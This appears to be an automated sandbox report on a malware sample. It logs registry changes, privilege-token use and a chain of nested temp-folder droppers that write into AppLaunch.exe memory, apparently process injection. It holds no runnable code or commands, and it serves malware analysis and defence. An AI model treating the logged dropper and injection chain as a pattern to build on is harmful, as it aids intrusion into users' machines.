Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3584 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe
PID 3584 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe
PID 3584 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe
PID 4036 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe
PID 4036 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe
PID 4036 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe
PID 2236 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe
PID 2236 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe
PID 2236 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe
PID 3824 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe
PID 3824 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe
PID 3824 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe
PID 4240 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe
PID 4240 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe
PID 4240 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe
PID 3196 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe
PID 3196 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe
PID 3196 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3196 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe
PID 3196 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe
PID 3196 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe
PID 3760 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
